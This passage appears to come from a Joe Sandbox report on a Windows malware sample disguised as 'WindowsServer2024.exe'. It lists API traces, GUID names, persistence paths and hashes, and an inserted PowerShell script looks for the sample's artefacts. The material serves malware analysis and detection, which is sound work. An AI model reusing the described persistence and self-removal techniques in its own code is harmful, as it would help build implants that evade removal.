                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2952
                                                                            • __snwprintf.LIBCMT ref: 007D297C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D298B
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007D29A9
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007D29BF
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D29D4
                                                                            • __snwprintf.LIBCMT ref: 007D2A03
                                                                            • _memset.LIBCMT ref: 007D2A13
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007D2A3E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A4D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A61
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A6B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A7C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A86
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A90
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$__snwprintflstrlen$CreateFileFolderKnownModuleNamePathProcessTask_memsetlstrcmpi
                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsServer2024.exe${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}
                                                                            • API String ID: 2642993909-2604637141
                                                                            • Opcode ID: 6c846c8447f29daf2679084849feec5cf869ac20d5bafd6f5c23a51655d38612
                                                                            • Instruction ID: f34ef6e797f80260b935d1e47a660aee93dd5f711bf4bcdf313dc4865b3ea79e
                                                                            • Opcode Fuzzy Hash: 6c846c8447f29daf2679084849feec5cf869ac20d5bafd6f5c23a51655d38612
                                                                            • Instruction Fuzzy Hash: B54130B5A40209ABDB10DBE4CC49FBE7B75FF88701F104969F601B6291DB789A41CB61
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007D5BA8), ref: 007D317A
                                                                            • SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D3196
                                                                            • __snwprintf.LIBCMT ref: 007D31B7
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D31C3
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D31CD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D31D7
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D31EA
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D31FF
                                                                            • __snwprintf.LIBCMT ref: 007D3229
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3238
                                                                            • __snwprintf.LIBCMT ref: 007D3263
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D326F
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007D3279
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3283
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D328D
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D3297
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc__snwprintf$DeleteFileFolderKnownPathTask$DirectoryRemove
                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${268A4BEB-78DB-4CA2-877B-85BE85A2E24B}${35573C81-0DF9-44C4-B616-731CF1FC3E59}${628E1A37-FDD6-4466-82D3-55913E02016C}
                                                                            • API String ID: 1689349194-68691684
                                                                            • Opcode ID: 3438a1b6316e7dd5e0cd9fd6be3dfd2b850e1f68b61bd47af754455bccc0878f
                                                                            • Instruction ID: 4fbd9b1d18eb82545e36866ee536445d427617caf5637da727d89f286f2e2b38
                                                                            • Opcode Fuzzy Hash: 3438a1b6316e7dd5e0cd9fd6be3dfd2b850e1f68b61bd47af754455bccc0878f
                                                                            • Instruction Fuzzy Hash: 853132B5A40309FBDB14DBA4DC4EF7E7779BB88701F104925F601B6390DAB89A40CB65
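The three function listings above expose host artefacts that can be checked directly: the cleanup routine (OpenEventW/OpenMutexW on two GUID names, SHFileOperationW on a "%s\%s" path built from a known folder and {C2479B37-...}, then RegDeleteKeyExW on HKCU "Software\{E83187BB-...}"), the launcher that compares its own module path with lstrcmpiW and runs WindowsServer2024.exe through CreateProcessW with the "%s%s" %s format and {9A30B3AA-...}, and the uninstall routine that deletes "%s\%s.lnk" and "%s\%s\%s.BAT" and removes a directory named by three further GUIDs. The PowerShell triage script below is an added example, not part of the Joe Sandbox report and not the sample's own code. Which known folders the sample resolves is not recoverable from this listing (the FOLDERID arguments are passed by pointer), so the candidate folders and the exact path layouts it tries are assumptions; the event and mutex are opened without a Global\ prefix, so the script must run in the same logon session as the suspect user to see them.

```powershell
# Added triage script: looks for the artefacts named in the three listings above.
# Not part of the Joe Sandbox report or the sample. Candidate known folders and
# path layouts are assumptions (the listing does not reveal the FOLDERIDs).

$Guids = @{
    Event     = '{16B194B1-19CC-4C52-92E2-1BFAC8473D8C}'   # OpenEventW target
    Mutex     = '{8931AB7A-A1AA-4E58-80EA-2B1247F36722}'   # OpenMutexW target
    RegKey    = '{E83187BB-7111-445B-879E-34A213BF001C}'   # HKCU\Software\%s
    DropPath  = '{C2479B37-C2B3-42BB-AA73-3313D48DF29B}'   # %s\%s passed to SHFileOperationW
    Install   = '{9A30B3AA-5D5B-4418-94BC-EA9A5585D123}'   # used alongside WindowsServer2024.exe
    Uninstall = @('{268A4BEB-78DB-4CA2-877B-85BE85A2E24B}',  # .lnk / .BAT / directory names
                  '{35573C81-0DF9-44C4-B616-731CF1FC3E59}',
                  '{628E1A37-FDD6-4466-82D3-55913E02016C}')
}
$Findings = [System.Collections.Generic.List[string]]::new()

# 1. Named synchronisation objects. No Global\ prefix in the sample, so these are
#    session-local; TryOpenExisting returns $false instead of throwing when absent.
$m = $null
if ([System.Threading.Mutex]::TryOpenExisting($Guids.Mutex, [ref]$m)) {
    $Findings.Add("mutex present: $($Guids.Mutex)"); $m.Dispose()
}
$e = $null
if ([System.Threading.EventWaitHandle]::TryOpenExisting($Guids.Event, [ref]$e)) {
    $Findings.Add("event present: $($Guids.Event)"); $e.Dispose()
}

# 2. The HKCU key the cleanup routine deletes with RegDeleteKeyExW(HKEY_CURRENT_USER, "Software\%s").
$key = "HKCU:\Software\$($Guids.RegKey)"
if (Test-Path -LiteralPath $key) {
    $Findings.Add("registry key present: $key")
}

# 3. GUID-named paths under candidate known folders (assumption: these five roots).
$Roots = @($env:LOCALAPPDATA, $env:APPDATA, $env:ProgramData,
           [Environment]::GetFolderPath('Startup'),
           [Environment]::GetFolderPath('CommonStartup')) | Where-Object { $_ }
$Names = @($Guids.DropPath, $Guids.Install) + $Guids.Uninstall
foreach ($root in $Roots) {
    foreach ($n in $Names) {
        # Layouts mirror the format strings in the listing: %s\%s, %s\%s.lnk, %s\%s\%s.BAT
        foreach ($candidate in @("$root\$n", "$root\$n.lnk", "$root\$n\$n.BAT")) {
            if (Test-Path -LiteralPath $candidate) { $Findings.Add("path present: $candidate") }
        }
    }
    # The launcher runs WindowsServer2024.exe; look a couple of levels down for a copy.
    Get-ChildItem -LiteralPath $root -Filter 'WindowsServer2024.exe' -Recurse -Depth 2 -File -ErrorAction SilentlyContinue |
        ForEach-Object { $Findings.Add("launcher binary: $($_.FullName)") }
}

# 4. Running instances of the launcher binary, wherever it was placed.
Get-Process -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -and (Split-Path $_.Path -Leaf) -ieq 'WindowsServer2024.exe' } |
    ForEach-Object { $Findings.Add("process: PID $($_.Id) $($_.Path)") }

if ($Findings.Count -eq 0) { 'none of the artefacts from this report were found' } else { $Findings }
```

Run it as the affected user (not from an elevated session of a different account) so the session-local event and mutex checks are meaningful; a hit on the mutex or event means the implant is still resident, while registry or file hits alone may be leftovers from an interrupted cleanup run.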
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CE187
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE1D8
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CE1E5
                                                                            • wnsprintfW.SHLWAPI ref: 007CE242
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CE252
                                                                            • wnsprintfW.SHLWAPI ref: 007CE284
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CE2CB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2DE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2EB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2F8
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CE30A
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE31D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CE327
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CE333
                                                                            • closesocket.WS2_32(?), ref: 007CE33D
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcess__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: "%s" %s$%s%s$D$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 2452205246-585898561
                                                                            • Opcode ID: b6992aa4adc89439c1b3bfd64e8dcea073102924a841c26899969fe3f7ac0792
                                                                            • Instruction ID: 601250a124c1a424868e320331ebfd8c8a7f5b49b8094a47b00a4f175d3097fb
                                                                            • Opcode Fuzzy Hash: b6992aa4adc89439c1b3bfd64e8dcea073102924a841c26899969fe3f7ac0792
                                                                            • Instruction Fuzzy Hash: 60512CB1A00218ABEB24DBA4DC49FADB775FB88700F1085ACF609A7291DB749984CF51
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(UNLOAD.TXT), ref: 007D69AE
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D69C0
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CBA30,00000000,00000000,00000000), ref: 007D69E3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6A01
                                                                            • _memset.LIBCMT ref: 007D6A7A
                                                                            • __snwprintf.LIBCMT ref: 007D6A9F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6AD9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6B24
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CF100,00000000,00000000,00000000), ref: 007D6B47
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6B64
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 007D6B73
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DB630,00000000,00000000,00000000), ref: 007D6B95
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1030,00000000,00000000,00000000), ref: 007D6BAF
                                                                            • WSACleanup.WS2_32 ref: 007D6BCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartup__snwprintf_memsetlstrlen
                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 990009833-710896368
                                                                            • Opcode ID: 3d0a5fe2d659ec980ce5bae5c7cc009669e1cc7dbe8e348da454cc19c5d7b4d2
                                                                            • Instruction ID: d01cae921e73f6c6ca8953f8082a26c6cd9fbe4ecd1b66fc584a1fb4a63368db
                                                                            • Opcode Fuzzy Hash: 3d0a5fe2d659ec980ce5bae5c7cc009669e1cc7dbe8e348da454cc19c5d7b4d2
                                                                            • Instruction Fuzzy Hash: EA518371A40310EBEB209B60EC4FF643374B784B05F10845AF249BA3D1DAF86984CF19
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB03
                                                                            • GetLastError.KERNEL32 ref: 007CFB0E
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CFB26
                                                                            • wsprintfW.USER32 ref: 007CFB4F
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CFB7A
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 007CFBD1
                                                                            • GetLastError.KERNEL32 ref: 007CFBDD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC72
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC7C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC86
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFCE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorFileLast$DirectoryFolderKnownModuleNamePathTask__snwprintfwsprintf
                                                                            • String ID: %s%s$P
                                                                            • API String ID: 4093884390-50959982
                                                                            • Opcode ID: fc7fa028ffe7065d9d27199a2b0094e1c485f46959025509c1aa33a46671581c
                                                                            • Instruction ID: 52938617f12546e2416988f6d72f5691bc94811ef854811c90860f988abfb574
                                                                            • Opcode Fuzzy Hash: fc7fa028ffe7065d9d27199a2b0094e1c485f46959025509c1aa33a46671581c
                                                                            • Instruction Fuzzy Hash: D7511075A01218EBDB20DBA4EC8CFAD7B75BB48311F1046ADE515A6290CB789E81CF64
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D346D
                                                                            • _memset.LIBCMT ref: 007D3492
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D349E
                                                                            • __snwprintf.LIBCMT ref: 007D34D5
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D34E6
                                                                            • GetLastError.KERNEL32 ref: 007D3508
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007D3520
                                                                            • __snwprintf.LIBCMT ref: 007D3551
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D3560
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007D3575
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007D3591
                                                                            • _memmove.LIBCMT ref: 007D35C2
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D35CE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D35DB
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007D35F0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D35FD
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 007D360A
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3614
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DirectoryFreeLocal$AllocCreateRemoveTask__snwprintflstrlen$ErrorFolderKnownLastPath_memmove_memset
                                                                            • String ID: %s\System32$\\?\%s
                                                                            • API String ID: 2912166009-2868705786
                                                                            • Opcode ID: e77920dd3f64552bc779a5fed2b83c62ea8b42fe7822c4092d032df5f5383292
                                                                            • Instruction ID: d8f4831e46686286e6009426e5040cb27d785849949ac64a06a90c7b087cb0a4
                                                                            • Opcode Fuzzy Hash: e77920dd3f64552bc779a5fed2b83c62ea8b42fe7822c4092d032df5f5383292
                                                                            • Instruction Fuzzy Hash: 60415EB598021CEBDB20DBA0DC8DBE9B774BB98700F1049D5F509A6280D7789F80CF61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970
                                                                            • API String ID: 0-2197813208
                                                                            • Opcode ID: 050ca7a467cb8bf8f53547253d6a13cfa8e1dc6aaf02927f2630e82f70dfbe3b
                                                                            • Instruction ID: 46e559fb2bd4e281af64b44774ab4ef88687a17212a9dd94150ea6bc237c7ae4
                                                                            • Opcode Fuzzy Hash: 050ca7a467cb8bf8f53547253d6a13cfa8e1dc6aaf02927f2630e82f70dfbe3b
                                                                            • Instruction Fuzzy Hash: 3BC1FCB1A00318EFDB14DFA4DC49BAEBBB5BF88704F108559E609AB380D7799984CF51
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                            • GetLastError.KERNEL32 ref: 007CB70C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                            • __snwprintf.LIBCMT ref: 007CB74E
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                            • GetLastError.KERNEL32 ref: 007CB77C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB851
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorLast__snwprintf$DirectoryFileFolderKnownPathTask
                                                                            • String ID: %s%s$P$WindowsServer2024.exe
                                                                            • API String ID: 3676116642-1786351275
                                                                            • Opcode ID: 7351a5dd1b1db2c9915230ed88f648611015470910b59da09ba13bd030603135
                                                                            • Instruction ID: 486e8876c4a28b009c4dd923362c4886f1852ed505e4ab5097e7acfcf136c321
                                                                            • Opcode Fuzzy Hash: 7351a5dd1b1db2c9915230ed88f648611015470910b59da09ba13bd030603135
                                                                            • Instruction Fuzzy Hash: 7141C875D00209EBDF14DBA4DC4AFAEBBB9BB88711F10452DF611B6290D7789940CFA1
                                                                            Strings
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
